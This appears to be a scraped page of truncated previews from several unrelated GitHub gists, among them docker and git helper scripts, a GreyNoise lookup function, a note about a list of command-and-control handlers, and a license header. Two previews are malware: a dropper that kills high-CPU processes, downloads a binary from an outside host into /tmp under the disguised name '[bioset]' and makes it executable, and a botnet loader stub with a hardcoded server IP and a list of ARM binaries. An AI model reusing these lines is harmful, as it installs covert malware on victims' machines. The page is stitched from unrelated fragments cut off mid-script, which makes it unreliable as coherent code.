This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.
Servers could be malicious, or just part of a red teaming action.
export DATADIR=$(pwd)/tkiv-data/ | |
for s in "pd1 pd2 pd3 tikv1 tikv2 tikv3"; do | |
docker stop $s | |
docker rm $s | |
done | |
#ifconfig lo0 alias 192.168.1.101 | |
#ifconfig lo0 alias 192.168.1.102 | |
#ifconfig lo0 alias 192.168.1.103 |
#!/bin/bash | |
set -e | |
DEST=$(mktemp -d) | |
SRC=$(pwd) | |
pushd . | |
cd $DEST; git clone $SRC/.git . >/dev/null 2>&1 | |
cd $SRC; git diff -P --cached | patch -p1 -d $DEST >/dev/null |
#!/bin/bash | |
DEST=$(mktemp -d) | |
SRC=$(pwd) | |
echo "Cloning $SRC into $DEST" | |
pushd . | |
cd $DEST | |
git clone $SRC/.git . |
function greynoise | |
if test (count $argv) -eq 0 | |
echo "No arguments specified. Usage:\necho greynoise {ip}" | |
return 1 | |
end | |
set ip $argv[1] | |
curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'|jq '.' | |
end |
This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.
Currently working on reversing the getPcodePacked command.
Next steps:
ps aux |awk '$3>40.0{print $2}'|xargs kill -9 | |
cd /tmp | |
if [ $? -ne 0 ] | |
then | |
export PATH=`pwd`:$PATH | |
else | |
export PATH=/tmp:$PATH | |
fi | |
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\] | |
chmod +x \[bioset\] |
#!/bin/sh | |
# Edit | |
WEBSERVER="209.141.50.26" | |
# Stop editing now | |
BINARIES="arm arm7 arm64" | |
for Binary in $BINARIES; do |
#!/usr/bin/env python | |
# -*- coding: utf-8 -*- | |
# Copyright 2012-2017 Matt Martz | |
# All Rights Reserved. | |
# | |
# Licensed under the Apache License, Version 2.0 (the "License"); you may | |
# not use this file except in compliance with the License. You may obtain | |
# a copy of the License at | |
# | |
# http://www.apache.org/licenses/LICENSE-2.0 |